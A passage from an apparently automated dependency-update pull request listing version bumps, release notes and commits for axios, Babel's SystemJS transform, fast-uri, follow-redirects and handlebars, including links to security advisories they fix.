href=\"https://github.com/axios/axios/commit/f4f2d76e25cc0f777e5416e2d76282ab873ef9dc\"\u003e\u003ccode\u003ef4f2d76\u003c/code\u003e\u003c/a\u003e chore: stop committing dist/ and remove bower (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1f2f64433e5be205d74471c78c2721909282b9c0\"\u003e\u003ccode\u003e1f2f644\u003c/code\u003e\u003c/a\u003e chore: add CODEOWNERS (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/44bca902e1bdd7dd6490c7b4985b63e729b0e634\"\u003e\u003ccode\u003e44bca90\u003c/code\u003e\u003c/a\u003e fix: improve regex in AxiosURLSearchParams (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4c4f07fabdb005f5430bab797f12b55e2ed5fb33\"\u003e\u003ccode\u003e4c4f07f\u003c/code\u003e\u003c/a\u003e fix: form data recursion (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.30.2...v0.32.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.16.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.1.0 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.7 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 